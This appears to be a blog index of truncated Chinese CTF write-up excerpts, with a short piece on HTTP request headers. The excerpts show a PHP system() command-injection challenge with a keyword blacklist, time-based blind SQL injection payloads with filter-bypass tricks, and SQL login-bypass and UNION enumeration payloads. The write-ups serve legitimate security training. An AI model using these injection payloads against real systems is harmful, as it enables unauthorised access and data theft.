Yxing

SYCTF2023签到源码 登录进去直接先登录，但是随便试了几个均错误，以为是sql，测了下没测出来，然后直接抓包去试了下弱口令爆破，真成了。。。。 访问index.php,获得flag 宝宝巴士<?php$rce = $_GET['rce'];if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; }} else { ...

湘岚杯冷暴力不管输入什么，页面均只回显”嗯”，经典的时间盲注 构造payload为1 and sleep(2)尝试，能够sleep，说明为数字型且sleep未被过滤，构造payload如下 1 and if(1,sleep(2),0)# #能够sleep，说明if、逗号未被过滤1 and if(length(1)=1,sleep(2),0)# #不能sleep，说明length或=被过滤1 and 1=1 and sleep(2)# #能够sleep，说明=未被过滤，尝试大写绕过length1 and if(Length(1)=1,sleep(2),0)# #成功sleep(双写绕过也行)1 and if(substr('1',1,1)='1',sleep(2),0)# #不能sleep，说明substr被过滤，大写或双写绕过尝试1 and if(subsubstrstr('1',1,1)='1',sleep(2),0)# #成功sleep1 and...

参考详解request headers（一篇讲完常见字段） 一.定义HTTP请求头部（HTTP Request Headers）：HTTP协议中的一部分，用于在客户端和服务器之间传递附加信息。这些头部字段提供了关于请求、客户端环境、或请求的上下文的信息。 请求头是键值对的形式，每个key对应填写相应的内容（内容可能包括多个取值，取多个值时，以“;”分隔）。通过bp抓包可以得到或者更改请求头信息，比如以下就是通过bp抓访问百度包的请求头 GET / HTTP/1.1Host: www.baidu.comCookie: BAIDUID=D915327BE37405BA6581E6C24AC9305D:FG=1;...

2019[极客大挑战 2019]EasySQL 直接万能密码闭合后登录即获得flag 闭合后语句username=1&password='1' or 1=1#' [极客大挑战 2019]LoveSQL使用万能密码尝试 username=1&password=1' or 1=1# 有回显位置了，且题目提示flag放在了其他位置，下述payload的password均为上图数据 username=admin' order by 3# order by判断列数，列数为4时报错username=a' union select 1,2,3#用不存在的username才能找到回显位，不然使用admin只会重复上图，回显位为2，3username=a' union select 1,(database()),3#库名为geekusername=a' union select 1,(select group_concat(table_name) from...

签到 错误输入一次后在url框中发现false，修改为true后获得flag 喜欢做签到的 CTFer 你们好呀题目要求ctf战队招新网站，在承办单位中找到，进去后为Linux终端 flag1通过help命令找出可用命令，再用ls -la命令找到隐藏的.flag文件，cat .flag获得 flag{0k_175_a_h1dd3n_s3c3rt_f14g___please_join_us_ustc_nebula_anD_two_maJor_requirements_aRe_shown_somewhere_else} flag2输出.oh-you-found-it的内容，提示考虑其他目录，进入Awards时提示要管理员权限，但是sudo...